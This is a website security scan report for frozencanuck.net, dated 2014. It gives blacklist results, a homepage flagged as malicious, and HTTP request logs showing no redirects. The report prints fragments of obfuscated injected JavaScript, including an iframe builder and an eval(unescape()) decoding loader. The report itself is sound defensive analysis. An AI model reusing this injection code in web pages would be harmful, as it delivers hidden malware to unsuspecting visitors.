Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frozencanuck.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frozencanuck.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://frozencanuck.net/ | 200 OK Content-Length: 2970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;O0O0=new Array();O0O0[0]='<iframe src="http://';O00O='fu';OO0O='FbbGPODYCOpTqEvRxXGRYTasKSUOysOO';O00O+='nction __'+'__(_'+'O0){';O0OO='v%61%72%20%6C%32%3Dwi\156\144o\167%2Eopera%3F%31%3A%30%3B%66un\143ti Decoded script: function ____(_O0){eval(unescape(_O0))} function ____(_O0){eval(unescape(_O0))} var l2=window.opera?1:0;function l3(l4){l5=/za/g;l6=String.fromCharCode(0);l4=l4.replace(l5,l6);var l7=new Array(),l8=_1=l4.length,l9,lI,il=16256,_1=0,I=0,li='';do{l9=l4.charCodeAt(_1);lI=l4.charCodeAt(++_1);l7[I++]=lI+il-(l9<<7)}while(_1++<l8);var l1=new Array(),l0=new Array(),Il=128;do{l0[Il]=String.fromCharCode(Il)}while(--Il);Il=128;l1[0]=li=l0[l7[0]];ll=l7[0];_l=1;var l_=l7.length-1;while(_ Antivirus reports:
| ||
http://frozencanuck.net/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frozencanuck.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Aug 2014 10:50:26 GMT
Accept-Ranges: bytes
ETag: "2a84829-b9a-4586af9a59a40"
Server: Apache
Content-Length: 2970
Content-Type: text/html
Last-Modified: Sat, 04 Oct 2008 10:33:05 GMT
...2970 bytes of data.
GET / HTTP/1.1
Host: frozencanuck.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Aug 2014 10:50:26 GMT
Accept-Ranges: bytes
ETag: "2a84829-b9a-4586af9a59a40"
Server: Apache
Content-Length: 2970
Content-Type: text/html
Last-Modified: Sat, 04 Oct 2008 10:33:05 GMT
...2970 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frozencanuck.net
Referer: http://www.google.com/search?q=frozencanuck.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frozencanuck.net
Referer: http://www.google.com/search?q=frozencanuck.net
Result:
The result is similar to the first query. There are no suspicious redirects found.